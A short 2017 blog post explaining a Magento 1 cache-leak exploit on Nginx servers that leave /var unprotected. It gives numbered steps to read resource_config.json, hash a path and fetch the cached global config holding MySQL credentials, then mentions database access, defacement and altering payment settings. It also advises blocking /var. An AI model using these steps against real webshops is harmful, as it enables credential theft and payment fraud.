[EN] Magento 1 cacheleak exploit

Door 9 januari 2017Tips & Trucs

In the last two years Magento did release a lot of patches for (security) issues with Magento 1. If you apply those patches shortly after the release you’re pretty save. But your server configuration is important too! For example when you switch the Apache webserver for Nginx, .htaccess files don’t work anymore so you’ve to make sure you’ve configured it safely.

You can find .htaccess files across multiple folders with a default Magento 1 installation, not only in the root. For example the .htaccess file in the /var directory blocks access to all files in there. Don’t forget to block access to that directory in your Nginx configuration too! If you don’t block access people can access log files and even cached files. You may think that’s not dangerous but it is, with this exploit you can get the MySQL database credentials.

  1. First, check if a website is vulnerable at magereport.com
  2. Try to access the resource_config.json file by visiting http://website.com/var/resource_config.json
  3. Copy and modify the media directory path from the resource_config.json file to something like: /home/users/username/website.com/app/etc (make sure it points to /app/etc)
  4. Create a MD5 hash from that path, for example with http://www.md5.cz/ or generate it from the terminal: php -r "echo md5('PATH');" en replace the path, that will generate something like: 68095313d2b99db25e7ebcd5bc8d9642
  5. Use the first 3 characters from that hash, with my example that will be 680
  6. Visit http://website.com/var/cache/mage--2/mage---XXX_CONFIG_GLOBAL and replace the XXX with those 3 characters
  7. Now you can search in the global configuration, you can find among other things the MySQL credentials here
  8. Try to connect to the database remotely or search for a PhpMyAdmin or Adminer script

From that point the possibilities are endless as I’ve written before in my Hacking public GIT repositories post, from defacing to change payment provider credentials and further.

Why now publish this exploit? I’ve “created” it in 2015 but back then a lot of webshops where vulnerable. Meanwhile the percentage is pretty low so I thought; let’s share it with the world.

Do you need a security audit for your webshop? Contact me!